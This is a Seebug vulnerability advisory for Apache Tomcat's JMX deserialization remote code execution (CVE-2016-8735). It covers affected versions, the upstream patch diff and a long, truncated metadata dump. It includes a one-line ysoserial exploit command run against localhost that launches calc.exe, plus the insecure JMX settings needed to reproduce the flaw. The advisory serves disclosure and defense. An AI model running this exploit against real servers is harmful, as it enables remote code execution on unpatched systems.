Apache Tomcat Remote Code Execution（CVE-2016-8735）

2016-11-25T00:00:00

Description

**Update 12/04** : the need to note that in conf/server,xml to increase the configuration, you need the catalina-jmx-remote. the jar and the groovy-2.3.9. jar package into lib directory And modify the CATALINA_OPTS"-Dcom. sun. management. jmxremote. ssl=false-Dcom. sun. management. jmxremote. authenticate=false" The following details of the reference source: [0c0c0f](<https://mp.weixin.qq.com/s?__biz=MzAwMzI0MTMwOQ==&mid=2650173865&idx=1&sn=431e634a1350b070b54f9b5becd9a143&key=9ed31d4918c154c8af360e3955a9c76c2d28b7b700fce01b12fe1d3fe878a810323d81b26788da6aa2b6338bc6796969265d165d6a7384351359a6a75a1e5e68a3aeaa96554e3fedbc2e722d1637fcd8>) Oracle fixes JmxRemoteLifecycleListener deserialization Vulnerability(CVE-2016-3427)。 Tomcat also uses the JmxRemoteLifecycleListener this listener,but the Tomcat did not timely upgrade, so there is this remote code execution vulnerability. Affected version: Apache Tomcat 9.0.0. M1 to 9.0.0. M11 Apache Tomcat 8.5.0 to 8.5.6 Apache Tomcat 8.0.0. RC1 to 8.0.38 Apache Tomcat 7.0.0 to 7.0.72 Apache Tomcat 6.0.0 to 6.0.47 Not affected version: * Upgrade to Apache Tomcat 9.0.0. M13 or later (Apache Tomcat 9.0.0. M12 has the fix but was not released) * Upgrade to Apache Tomcat 8.5.8 or later (Apache Tomcat 8.5.7 has the fix but was not released) * Upgrade to Apache Tomcat 8.0.39 or later * Upgrade to Apache Tomcat 7.0.73 or later * Upgrade to Apache Tomcat 6.0.48 or later Usage scenarios: Zabbix 2.0 has been the JMX monitoring added to the system, itself, is no longer dependent on third-party tools. This is on a Tomcat application and other Java application monitoring easier. Herein, a simple description Zabbix use JMX to monitor Tomcat process. poc: https://github.com/frohoff/ysoserial tomcat version 8. 0. 36 conf/server. xml increase the configuration: ![](http://mmbiz.qpic.cn/mmbiz_png/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMsr0CKm5AcHVHSzXpMIYH03BPuAic4RoOD1dquK3OBlF1iaUVUumUKM56Q/) ![](http://mmbiz.qpic.cn/mmbiz_png/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMs0Ice9DYnVkkRCkdSE4aElBxp1Na38BYJpW2YwRw2NcnwOG1oPFpbTQ/) `` F:\HackTools\EXP>java-cp ysoserial-master-v0.0.4.jar ysoserial. exploit. RMIRegis tryExploit localhost 10001 Groovy1 calc.exe `` ![](http://mmbiz.qpic.cn/mmbiz_png/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMsHNOqbCAzyc4WPUO1uW8wGYBoh5iaz4OASre1sR1MbWaAXu0W7QLX57w/) Patch code: Diff of /tomcat/trunk/webapps/docs/changelog.xml `Parent Directory | Revision Log | Patch --- tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:28 1767643 +++ tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:36 1767644 @@ -97,6 +97,10 @@ StoreConfig component includes the executor name when writing the The Connector configuration. (markt) </fix> + <fix> + When configuring the JMX remote listener, specify the allowed types for + the credentials. (markt) + </fix> </changelog> </subsection>` /tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java `` Parent Directory | Revision Log | Patch \--- tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:28 1767643 +++ tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:36 1767644 @@ -264,6 +264,10 @@ serverCsf = new RmiClientLocalhostSocketFactory(serverCsf); } * env. put("jmx. remote. rmi. server. credential. types", new String[] { * String[]. class. getName(), * String. class. getName() }); \+ // Populate the env properties used to create the server if (serverCsf != null) { env. put(RMIConnectorServer. RMI_CLIENT_SOCKET_FACTORY_ATTRIBUTE, serverCsf); @@ -328,7 +332,7 @@ cs = new RMIConnectorServer(serviceUrl, theEnv, server, The ManagementFactory. getPlatformMBeanServer()); cs. start(); * registry. bind("jmxrmi", server); * registry. bind("jmxrmi", server. toStub()); log. info(sm. getString("jmxRemoteLifecycleListener. start", Integer. toString(theRmiRegistryPort), Integer. toString(theRmiServerPort), serverName)); `` This vulnerability, there are other use posture, the harm is huge, so to change the JMX password authentication is necessary now!

{"id": "SSV:92553", "vendorId": null, "type": "seebug", "bulletinFamily": "exploit", "title": "Apache Tomcat Remote Code Execution\uff08CVE-2016-8735\uff09", "description": "**Update 12/04** : the need to note that in conf/server,xml to increase the configuration, you need the catalina-jmx-remote. the jar and the groovy-2.3.9. jar package into lib directory And modify the CATALINA_OPTS\"-Dcom. sun. management. jmxremote. ssl=false-Dcom. sun. management. jmxremote. authenticate=false\"\n\nThe following details of the reference source: [0c0c0f](<https://mp.weixin.qq.com/s?__biz=MzAwMzI0MTMwOQ==&mid=2650173865&idx=1&sn=431e634a1350b070b54f9b5becd9a143&key=9ed31d4918c154c8af360e3955a9c76c2d28b7b700fce01b12fe1d3fe878a810323d81b26788da6aa2b6338bc6796969265d165d6a7384351359a6a75a1e5e68a3aeaa96554e3fedbc2e722d1637fcd8>)\n\nOracle fixes JmxRemoteLifecycleListener deserialization Vulnerability(CVE-2016-3427)\u3002 Tomcat also uses the JmxRemoteLifecycleListener this listener,but the Tomcat did not timely upgrade, so there is this remote code execution vulnerability.\n\nAffected version: Apache Tomcat 9.0.0. M1 to 9.0.0. M11 Apache Tomcat 8.5.0 to 8.5.6 Apache Tomcat 8.0.0. RC1 to 8.0.38 Apache Tomcat 7.0.0 to 7.0.72 Apache Tomcat 6.0.0 to 6.0.47\n\nNot affected version:\n\n * Upgrade to Apache Tomcat 9.0.0. M13 or later (Apache Tomcat 9.0.0. M12 has the fix but was not released)\n * Upgrade to Apache Tomcat 8.5.8 or later (Apache Tomcat 8.5.7 has the fix but was not released)\n * Upgrade to Apache Tomcat 8.0.39 or later\n * Upgrade to Apache Tomcat 7.0.73 or later\n * Upgrade to Apache Tomcat 6.0.48 or later\n\nUsage scenarios: Zabbix 2.0 has been the JMX monitoring added to the system, itself, is no longer dependent on third-party tools. This is on a Tomcat application and other Java application monitoring easier. Herein, a simple description Zabbix use JMX to monitor Tomcat process.\n\npoc: https://github.com/frohoff/ysoserial\n\ntomcat version 8. 0. 36\n\nconf/server. xml increase the configuration:\n\n![](http://mmbiz.qpic.cn/mmbiz_png/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMsr0CKm5AcHVHSzXpMIYH03BPuAic4RoOD1dquK3OBlF1iaUVUumUKM56Q/)\n\n![](http://mmbiz.qpic.cn/mmbiz_png/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMs0Ice9DYnVkkRCkdSE4aElBxp1Na38BYJpW2YwRw2NcnwOG1oPFpbTQ/)\n\n`` F:\\HackTools\\EXP>java-cp ysoserial-master-v0.0.4.jar ysoserial. exploit. RMIRegis tryExploit localhost 10001 Groovy1 calc.exe\n\n``\n\n![](http://mmbiz.qpic.cn/mmbiz_png/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMsHNOqbCAzyc4WPUO1uW8wGYBoh5iaz4OASre1sR1MbWaAXu0W7QLX57w/)\n\nPatch code:\n\nDiff of /tomcat/trunk/webapps/docs/changelog.xml `Parent Directory | Revision Log | Patch --- tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:28 1767643 +++ tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:36 1767644 @@ -97,6 +97,10 @@ StoreConfig component includes the executor name when writing the The Connector configuration. (markt) </fix> + <fix> + When configuring the JMX remote listener, specify the allowed types for + the credentials. (markt) + </fix> </changelog> </subsection>`\n\n/tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java `` Parent Directory | Revision Log | Patch \\--- tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:28 1767643 +++ tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:36 1767644 @@ -264,6 +264,10 @@ serverCsf = new RmiClientLocalhostSocketFactory(serverCsf); }\n\n * env. put(\"jmx. remote. rmi. server. credential. types\", new String[] {\n * String[]. class. getName(),\n * String. class. getName() }); \\+ // Populate the env properties used to create the server if (serverCsf != null) { env. put(RMIConnectorServer. RMI_CLIENT_SOCKET_FACTORY_ATTRIBUTE, serverCsf); @@ -328,7 +332,7 @@ cs = new RMIConnectorServer(serviceUrl, theEnv, server, The ManagementFactory. getPlatformMBeanServer()); cs. start();\n * registry. bind(\"jmxrmi\", server);\n * registry. bind(\"jmxrmi\", server. toStub()); log. info(sm. getString(\"jmxRemoteLifecycleListener. start\", Integer. toString(theRmiRegistryPort), Integer. toString(theRmiServerPort), serverName)); ``\n\nThis vulnerability, there are other use posture, the harm is huge, so to change the JMX password authentication is necessary now!\n", "published": "2016-11-25T00:00:00", "modified": "2016-11-25T00:00:00", "epss": [{"cve": "CVE-2016-3427", "epss": 0.07811, "percentile": 0.93525, "modified": "2023-11-26"}, {"cve": "CVE-2016-8735", "epss": 0.28653, "percentile": 0.96377, "modified": "2023-11-26"}], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.seebug.org/vuldb/ssvid-92553", "reporter": "Root", "references": [], "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "immutableFields": [], "lastseen": "2017-11-19T12:02:44", "viewCount": 2181, "enchantments": {"score": {"value": 9.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "aix", "idList": ["JAVA_APRIL2016_ADVISORY.ASC"]}, {"type": "amazon", "idList": ["ALAS-2016-688", "ALAS-2016-693", "ALAS-2016-700", "ALAS-2016-776", "ALAS-2016-777", "ALAS-2016-778"]}, {"type": "archlinux", "idList": ["ASA-201611-22"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-65102", "JRASERVER-65102"]}, {"type": "attackerkb", "idList": ["AKB:C3CF0D9C-F7A6-43C6-802E-F6894C586B9A", "AKB:D91AE5D0-67DF-4E98-925D-B730FC5F2045"]}, {"type": "centos", "idList": ["CESA-2016:0650", "CESA-2016:0651", "CESA-2016:0675", "CESA-2016:0676", "CESA-2016:0723"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0968"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2016-3427", "CISA-KEV-CVE-2016-8735"]}, {"type": "cve", "idList": ["CVE-2016-3427", "CVE-2016-8735"]}, {"type": "debian", "idList": ["DEBIAN:DLA-451-1:707F7", "DEBIAN:DLA-728-1:A9D65", "DEBIAN:DLA-728-1:ECD0E", "DEBIAN:DLA-729-1:1B0B9", "DEBIAN:DLA-729-1:E931B", "DEBIAN:DSA-3558-1:5D79E", "DEBIAN:DSA-3738-1:66970", "DEBIAN:DSA-3738-1:EB221", "DEBIAN:DSA-3739-1:06429", "DEBIAN:DSA-3739-1:1BDAB"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-3427", "DEBIANCVE:CVE-2016-8735"]}, {"type": "f5", "idList": ["F5:K49820145", "F5:K73112451", "SOL49820145", "SOL73112451"]}, {"type": "fedora", "idList": ["FEDORA:125286087B00", "FEDORA:1DA54604D2A3", "FEDORA:8CEB2616D980"]}, {"type": "freebsd", "idList": ["0B9AF110-D529-11E6-AE1B-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-18"]}, {"type": "ibm", "idList": ["025E2CD6F9F010517E9E17E8AC66A53012D7F2D3765B567272ACF4ED02426647", "029AA49A507A723A5E4C56429FB5A19F84FFBFB3D81F702E5C7D95F238C49FAF", "07DBE9517A4611E5419E1606D2F71A8201613E4042A34EE495FE116635651800", "0A188938BB57625255598B9B581375E3C99A86BB3F15E48ED8315B0895EAF89D", "0AEC3ABCCFB562437ED4141670F5C7C6E096FEFB11D3045A28046C82B784AD9E", "0C4F91C9AA7E146EDA1AA877B92C4C590E445AC7D2AC0E60ECCE4BA77A47F0EB", "0D0755F0269505405CB64BD65BD409DF7890B56244501D37813BE723F406D6C1", "0E275DB0879F2F3FE93DB95B54E59F113110390231355F64AD1605244203F94C", "1589B4745F310D5E19839D029CFF7AA2E7CE499911AB5E7A7A0995F367A8F990", "1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "21814730A396F5E3C91B95B6F895601A0824D3A6D8E235F7EFBA63C853BE3563", "265C7F39696063EC6C052A835129BE2250A30FFCD1A9F5A46A6025E12F1AEC5A", "2E9BC1AFBA9F34E20E313BA5B8B5B6C1AEEC0E8F6EC0B353125AA17460789A62", "2EBE18E6BFBAB729289EB191B100C4B2DB254A6249E2A51851B4C72069DDA2FF", "2F849754C32CC7E1EC23ADD90E35A80C3A3A4B7890DAD95ADA048C88D062115A", "300B30B77E64A29C8B399F8C62E9F501F6C76F9367F47CB2AECB5124ADBB7048", "30B97F976830F38EC78A601AC4AF08E5E915E3601910C6A37C3824A2F36E31B8", "3352ECB45B78D0B42C884136DC8EEAB3DFA07BBC5F0040DCA087FF7BC4435447", "342276C20A5C5FDDDF8726F4B0773A53244224965A0AE1BE83CE2A30F753D938", "3595219827CBAE62E6C87140158C93E3FA2A013C8BCEC8A5B536BAC89C55BC21", "3685A36D136086CBDF1C072E6BE9AD83DCB1C185CE82F5183E3DE098D0CF7921", "391849D137C8AE4FB53B4FC5E1B3F8D0BCDD416F030E276A01FE226C2BE1B6BA", "39386BB32C57BB1B41EB54F0E3BBD3ECD3E1A6BE6C64795EC5DC2969E728D80F", "3B175B8B601A430DE67B3C46FDC9F27CED4587673E54755AD2690781ED1CB235", "3C13E1626546AB19B54BC13C855DB4A4A72EDBD9013028CD74215F23DDA82984", "3C67CAAA7F30B6812F7E9BDAD360C818D08704D065BB87A725B5C752904516A9", "3DF5A1EC8EEA23B1128F84C6374971EA3815E1F8281F849F3593423BB347D925", "3E52F30DE645ED79947372BF790D5DAB4B5FA29866C26DA53811D62A4E0B3206", "411DE209066A00259E38D292C22264C2EDA3B961B523920D589433F42FB534BC", "418A4C8D1E8F2E8A923DFE2C36570B4A5EF7B515E050C0F19513AF3DAE7D2628", "435516AF6D5C3AA4A41E050752C520D87248D73515C5F8742AB46F7FEAE2E9A4", "45B8083C191232F81D36077A9DB997569CBCDF51915A12038301F1630F4EE215", "471FC6DCFC7216154A057D59B759EF42BEB095C5F6F09974870FD1E5968AC39A", "4733D43646C8A9049B8454CA406366CE2D5051464AA128020F19F4299F6FC6E4", "4D0056EC4D5672FF48E356CFCC82780C64C9FB240D745F2F627F178D9CF22F0C", "4E95B5EB959CBE5490B90287812FD445A690A3158E83D37882EADCE4A7BCD44F", "51AB1F7F50AE2546674F97D246115890E30F6672B86D6D523810D29C5BAE0D62", "5281637484F76A0F64AF63C7B85C8EF529B52AD9676E8EABE3AB850E14B04D98", "52BCF84201CEBA012FEF5D806CBEB019BE40DA44E167DE103878B677EE8CAFAB", "5E90705663750F9AAC65B53F188110D6CF86356EBD6A0890270ADE925BFCD638", "5F3A2E75CBD34F2D760C7DAE0148B354CA04A0288478AD25F8ED498DB635196E", "5F7C53205F3C1DF73818472F4A9E6151FAF5B6BEA01F0D749018E0315B401DAE", "63348F566FADDD53F743F6728812719200000602FE07DC239E5916DE25B8BFFE", "64DD46BD08D899DF176194BC3B565D436438971A0D7BEC33DB449C0B7DBDB5B6", "6D6FD3B17FF4E3AEC7C3300A59DF811D1AEFB71253A1B03A9B6D6569C666112F", "6E10F95EC3209DC93A3215EDD3E09828D356327BBCFCB364CB9408C9804A6F8E", "6F9B3E5D97FDBB41059AA8C4DDC3F8C6E337642756FF537C16A61C7599D523B9", "75C8D2E2467315AEBB99E354E2DB2EE058EBC8CD1C3ACE162A19DF807E6B2876", "7996A5B21090888A5E92985E9AA52C1DFFD5B468A73A1B32557A0A11DFBE0724", "7AE8462B1ED6BC7CB18D0E602A33B224072317EEACEC3938F0976678B0C95AD4", "7D29B4909C6BF3ADF472798B711970B396D8FD474F784096D0CD51E0C3DE6E56", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "83C6825053110170B6E18DA8CE101AC7FA6B1A5EC5BE80DB952A19C36C94C4AB", "84CC191C6FF7D7F095AAC167AD676E34BADFF5788D009121FE195F8179866081", "88059994BDF023078EC1A0894C156708EBE6348CEBD9AE468DB229EA67B1E1FA", "8B5016D64A8BBF10B52DDF15458908578A8F9418D5076DA06FD0081F472F9FAA", "8CF3082A44DE60C67D8DC18C23EE26D771B4A91C0A12FDF0AA3BEC56135A0739", "9A135CF5F1DD70B64FF2E55C6A7E52F7C3A64DEEFDD86F45910661C5A67617D8", "9B76461F148C75BB1672D4E6CDC2D3BAB8D5A3142F9FF56BF418C9B0F91B19DF", "9C3CAFB5742400AAC9286EB9089506FEA84581BB4A12DAB6BB996F50EB47E45E", "9CD14117A91708D3923BD78C3B0E27E442D14B8976544CB69E7166B29DBCC7C9", "A5022E2B14C6CFC69E613237E07A6681EAB204D56E5668D8588C0AE424BB40D9", "A54D5DA424A230A6C4C61FA58EB1A69719615CD1E841D07FDB1CEC9FE4659E45", "A801B8C1EF0F6A4D59E8093D234C394269007D65A6E868D0FD1895AE417608B1", "AAA4733E548388B933C5FBCDCA4EFEA642E359C79EA119CE1225DE33E6D4A575", "AB8332BB49251697A40C4A181070CC821286458CE2114BD526688971705EBC0B", "ACF0F1F92955D253FE8D9A17FABBDE19665D165C1026886A0612F8B6186AA5A2", "AFAF169974B6AABF6CF7272D4406CAB1EDD15D52DAF28E97FB52D795BB07F8D1", "B0917B9B05986D5C57AFA7D61D59DB3AC46BF8A66810DCCC331CD59E3A0CC975", "B4C8559B2D36E25ABE9FBA0A4F587138E22094E71DD07485714AE1D179A84333", "B73E2AC64919358B53CBFE9E0576F144ECF05CB1E42E5E59DCDDEF0BD5FEF485", "B8D7C45A7B91FC54907F2A1A1E6B04BDAFBFDF653C7180AD40F4BA7A5091A75B", "B9410A108CEB6D3C9DFE0C1617FB34D181E021D243C3FB7F5DB35969D7C4CE52", "BC89FD795C8D2727ED36F68D3C0CB562583E29BA6F46C7C0230E9FDCF5110D99", "C0F8A4FDB16B6060757282B298924E8005EF0D1B30BB3472B793362E6109A282", "C3FB79ADA39B46791DCF93E4A2B6E50FE2792D0E382EF08036106CE4972770C2", "C4A25CF6BA3F6E71753F4E3FF5296DCAEA56B938BAE00EF5CB5BBAB12BD4FE3F", "C6A6ABECADB0A1B202F572A8F947AF9F8E55FD674DB366EDEFD2EC2DD4BCE5B7", "C9A06C4BC1ACE55A17C7DD2D9DD98AA6FDEE59C9586CAFC2375754D88139C6F2", "CE0E774D280D0A9EA8834062B059FA20181F271D6A07DE4FB444EC479DE07233", "D0DCF925CB843A3DD1CE13BFFE3A9D0AA7622AA1DBECD77AB5105922400050DA", "D28A33DD6F9F0616BF17BE9435C16BA5747AE3606D1B535CC4C8068BCF7BF4EB", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D3401CFFC13C94FF7D2FF5A22BBC41148B332C1541709016F3DE5E29E9CD7150", "D4C1C0E6A5170ECC8C7B3DFFE304FF401A904E8D9E1A70A203081EBBCDBE568F", "D86489221457B61FCC95E41FD2271EB756D72E51AED6BEEA73DF5EA02691AB18", "DA78D22BE98AAE3FAE7595498C22303F728B4F1A787F6AA2950D1A2B51579024", "DD2F47B9C661B3BFC13D692487D2B3B267C19A65B8A7DA475BBA8E20873399E0", "DE915924CF7F2670B1FFCDF6498DBB124F4087216A8B4D38EBCEE133912CE5E2", "E026D876441506065638E9669757F49A62954ECA499F837804AD1070CA5C7B19", "E095FC03096261FE55986EF4F402EA0A700BEE11F22BFA669379C13D2E1BC33B", "E19B380C2BF0F26DFDCBADD37C1B7D4A13ED463E7B4B4ECE7EEEC8895D5690CB", "E53C0B021C3B3F6C772C766061FE50D2491235944C75F752C4EF2C3047351511", "E568EF1AEDF71160C521687EEF39BAD4E7E38A89F906FA2D8B03A2FB9255CCC7", "E779812945D461E2AC5804611B54C4A491B1E4005572A27425DFC928CBC9BFC3", "EC04C84423EE0C4E734038A3305029BA46FF47C7662107F5FFC07C3ACF2F1F61", "F35F5FE0DA298C18416599A44F6A3AC496F0F4FEC9098F354459A1FB95F4A01E"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:7314019160937441300"]}, {"type": "mageia", "idList": ["MGASA-2016-0149", "MGASA-2016-0417"]}, {"type": "myhack58", "idList": ["MYHACK58:62201681747"]}, {"type": "nessus", "idList": ["700668.PASL", "9448.PRM", "9906.PASL", "ACTIVEMQ_5_15_5.NASL", "AIX_JAVA_APRIL2016_ADVISORY.NASL", "ALA_ALAS-2016-688.NASL", "ALA_ALAS-2016-693.NASL", "ALA_ALAS-2016-700.NASL", "ALA_ALAS-2016-776.NASL", "ALA_ALAS-2016-777.NASL", "ALA_ALAS-2016-778.NASL", "CENTOS_RHSA-2016-0650.NASL", "CENTOS_RHSA-2016-0651.NASL", "CENTOS_RHSA-2016-0675.NASL", "CENTOS_RHSA-2016-0676.NASL", "CENTOS_RHSA-2016-0723.NASL", "DEBIAN_DLA-451.NASL", "DEBIAN_DLA-728.NASL", "DEBIAN_DLA-729.NASL", "DEBIAN_DSA-3558.NASL", "DEBIAN_DSA-3738.NASL", "DEBIAN_DSA-3739.NASL", "EULEROS_SA-2016-1015.NASL", "F5_BIGIP_SOL73112451.NASL", "FEDORA_2016-98CCA07999.NASL", "FEDORA_2016-9C33466FBB.NASL", "FEDORA_2016-A98C560116.NASL", "FREEBSD_PKG_0B9AF110D52911E6AE1B002590263BF5.NASL", "GENTOO_GLSA-201606-18.NASL", "IBM_JAVA_2016_04_19.NASL", "OPENSUSE-2016-1455.NASL", "OPENSUSE-2016-1456.NASL", "OPENSUSE-2016-553.NASL", "OPENSUSE-2016-554.NASL", "OPENSUSE-2016-560.NASL", "OPENSUSE-2016-572.NASL", "OPENSUSE-2016-573.NASL", "ORACLELINUX_ELSA-2016-0650.NASL", "ORACLELINUX_ELSA-2016-0651.NASL", "ORACLELINUX_ELSA-2016-0675.NASL", "ORACLELINUX_ELSA-2016-0676.NASL", "ORACLELINUX_ELSA-2016-0723.NASL", "ORACLE_JAVA_CPU_APR_2016.NASL", "ORACLE_JAVA_CPU_APR_2016_UNIX.NASL", "ORACLE_JROCKIT_CPU_APR_2016.NASL", "ORACLE_RDBMS_CPU_OCT_2017.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2017_CPU.NASL", "REDHAT-RHSA-2016-0650.NASL", "REDHAT-RHSA-2016-0651.NASL", "REDHAT-RHSA-2016-0675.NASL", "REDHAT-RHSA-2016-0676.NASL", "REDHAT-RHSA-2016-0677.NASL", "REDHAT-RHSA-2016-0678.NASL", "REDHAT-RHSA-2016-0679.NASL", "REDHAT-RHSA-2016-0701.NASL", "REDHAT-RHSA-2016-0702.NASL", "REDHAT-RHSA-2016-0708.NASL", "REDHAT-RHSA-2016-0716.NASL", "REDHAT-RHSA-2016-0723.NASL", "REDHAT-RHSA-2016-1039.NASL", "REDHAT-RHSA-2016-1430.NASL", "REDHAT-RHSA-2017-0455.NASL", "REDHAT-RHSA-2017-0456.NASL", "REDHAT-RHSA-2017-1216.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL6_X.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL7_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "SL_20160509_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "SUSE_SU-2016-1248-1.NASL", "SUSE_SU-2016-1250-1.NASL", "SUSE_SU-2016-1299-1.NASL", "SUSE_SU-2016-1300-1.NASL", "SUSE_SU-2016-1303-1.NASL", "SUSE_SU-2016-1378-1.NASL", "SUSE_SU-2016-1379-1.NASL", "SUSE_SU-2016-1388-1.NASL", "TOMCAT_8_5_8.NASL", "UBUNTU_USN-2963-1.NASL", "UBUNTU_USN-2964-1.NASL", "UBUNTU_USN-2972-1.NASL", "UBUNTU_USN-3177-1.NASL", "UBUNTU_USN-3177-2.NASL", "UBUNTU_USN-4557-1.NASL", "VMWARE_VCENTER_VMSA-2016-0005.NASL", "VMWARE_VCLOUD_DIRECTOR_VMSA-2016-0005.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA_2016_0005.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2016_0005.NASL", "WEBSPHERE_MQ_SWG21982566.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105731", "OPENVAS:1361412562310108388", "OPENVAS:1361412562310120678", "OPENVAS:1361412562310120682", "OPENVAS:1361412562310120689", "OPENVAS:1361412562310122934", "OPENVAS:1361412562310122935", "OPENVAS:1361412562310122936", "OPENVAS:1361412562310122937", "OPENVAS:1361412562310131300", "OPENVAS:1361412562310703558", "OPENVAS:1361412562310703738", "OPENVAS:1361412562310703739", "OPENVAS:1361412562310807551", "OPENVAS:1361412562310810966", "OPENVAS:1361412562310811871", "OPENVAS:1361412562310842733", "OPENVAS:1361412562310842745", "OPENVAS:1361412562310842764", "OPENVAS:1361412562310843024", "OPENVAS:1361412562310843035", "OPENVAS:1361412562310851291", "OPENVAS:1361412562310851292", "OPENVAS:1361412562310851293", "OPENVAS:1361412562310851302", "OPENVAS:1361412562310851303", "OPENVAS:1361412562310851306", "OPENVAS:1361412562310851311", "OPENVAS:1361412562310851455", "OPENVAS:1361412562310851503", "OPENVAS:1361412562310871598", "OPENVAS:1361412562310871599", "OPENVAS:1361412562310871600", "OPENVAS:1361412562310871601", "OPENVAS:1361412562310871608", "OPENVAS:1361412562310872149", "OPENVAS:1361412562310872150", "OPENVAS:1361412562310872157", "OPENVAS:1361412562310882467", "OPENVAS:1361412562310882468", "OPENVAS:1361412562310882469", "OPENVAS:1361412562310882470", "OPENVAS:1361412562310882471", "OPENVAS:1361412562310882485", "OPENVAS:1361412562310882487", "OPENVAS:1361412562310882488", "OPENVAS:1361412562311220161015", "OPENVAS:703558", "OPENVAS:703738", "OPENVAS:703739"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2016V3", "ORACLE:CPUAPR2017", "ORACLE:CPUAPR2019", "ORACLE:CPUJAN2018", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2019", "ORACLE:CPUOCT2017"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0650", "ELSA-2016-0651", "ELSA-2016-0675", "ELSA-2016-0676", "ELSA-2016-0723"]}, {"type": "osv", "idList": ["OSV:DLA-728-1", "OSV:DLA-729-1", "OSV:DSA-3558-1"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "prion", "idList": ["PRION:CVE-2016-3427", "PRION:CVE-2016-8735"]}, {"type": "redhat", "idList": ["RHSA-2016:0650", "RHSA-2016:0651", "RHSA-2016:0675", "RHSA-2016:0676", "RHSA-2016:0677", "RHSA-2016:0678", "RHSA-2016:0679", "RHSA-2016:0701", "RHSA-2016:0702", "RHSA-2016:0708", "RHSA-2016:0716", "RHSA-2016:0723", "RHSA-2016:1039", "RHSA-2016:1430", "RHSA-2017:0455", "RHSA-2017:0456", "RHSA-2017:0457", "RHSA-2017:1216"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-8735"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1222-1", "OPENSUSE-SU-2016:1230-1", "OPENSUSE-SU-2016:1235-1", "OPENSUSE-SU-2016:1262-1", "OPENSUSE-SU-2016:1265-1", "OPENSUSE-SU-2016:3129-1", "OPENSUSE-SU-2016:3144-1", "SUSE-SU-2016:1248-1", "SUSE-SU-2016:1250-1", "SUSE-SU-2016:1299-1", "SUSE-SU-2016:1300-1", "SUSE-SU-2016:1303-1", "SUSE-SU-2016:1378-1", "SUSE-SU-2016:1379-1", "SUSE-SU-2016:1388-1", "SUSE-SU-2016:1458-1", "SUSE-SU-2016:1475-1", "SUSE-SU-2016:3079-1", "SUSE-SU-2016:3081-1", "SUSE-SU-2017:1632-1", "SUSE-SU-2017:1660-1"]}, {"type": "tomcat", "idList": ["TOMCAT:0DBA25EA40A6FEBF5FD9039D7F60718E", "TOMCAT:604E2DE63F4E10D22151D29C4D2E7487", "TOMCAT:7FF5C8CC86A7AF5DA33F4B5874774B9B", "TOMCAT:9E43DA1677EA0537439D1A6D19A16EC5", "TOMCAT:DCB8C0E7C96DD2367CF48625F7A47EDF"]}, {"type": "ubuntu", "idList": ["USN-2963-1", "USN-2964-1", "USN-2972-1", "USN-3177-1", "USN-3177-2", "USN-4557-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-3427", "UB:CVE-2016-8735"]}, {"type": "veracode", "idList": ["VERACODE:16827", "VERACODE:3831"]}, {"type": "vmware", "idList": ["VMSA-2016-0005", "VMSA-2016-0005.5"]}]}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2016-776", "ALAS-2016-777", "ALAS-2016-778"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-65102"]}, {"type": "centos", "idList": ["CESA-2016:0650", "CESA-2016:0651", "CESA-2016:0675", "CESA-2016:0676", "CESA-2016:0723"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0968"]}, {"type": "cve", "idList": ["CVE-2016-3427"]}, {"type": 